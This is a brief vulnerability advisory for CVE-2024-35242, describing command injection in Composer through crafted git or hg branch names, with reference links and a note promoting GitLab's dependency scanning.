CVE-2024-35242: Composer has multiple command injections via malicious git/hg branch names
The composer install
command running inside a git/hg repository which has specially crafted branch names can lead to command injection. So this requires cloning untrusted repositories.
References
- github.com/advisories/GHSA-v9qv-c7wm-wgmf
- github.com/composer/composer
- github.com/composer/composer/commit/6bd43dff859c597c09bd03a7e7d6443822d0a396
- github.com/composer/composer/commit/fc57b93603d7d90b71ca8ec77b1c8a9171fdb467
- github.com/composer/composer/security/advisories/GHSA-v9qv-c7wm-wgmf
- nvd.nist.gov/vuln/detail/CVE-2024-35242
Detect and mitigate CVE-2024-35242 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →